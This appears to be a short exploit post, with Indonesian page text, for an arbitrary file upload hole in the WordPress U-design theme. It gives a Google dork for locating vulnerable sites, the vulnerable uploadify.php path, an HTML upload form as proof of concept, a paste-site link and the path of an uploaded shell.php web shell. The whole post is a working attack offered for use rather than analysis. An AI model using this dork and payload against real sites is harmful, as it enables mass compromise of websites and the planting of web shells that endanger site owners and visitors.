WordPress Themes U-design File Upload
Daftar Isi Artikel
Dork: inurl:/wp-content/themes/[u/design OR u-design ]
Exploit Title : WordPress Themes U-design File Upload
Author : Mohammad peywasteh
Tested : Win10
-------------------------------------------
Dork: inurl:/wp-content/themes/u-design << Klik >>
Google Dork : inurl:/wp-content/themes/[u/design OR u-design ]
Exploit : https://localhost/ wp-content/themes/[u/design OR u-design ]/scripts/admin/uploadify/uploadify.php
Vulnerability : Exploit Page
PoC :
<form method="POST" action="https://localhost/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>
Klik >> https://ghostbin.com/paste/ov2md
File Access : https://localhost/patch/shell.php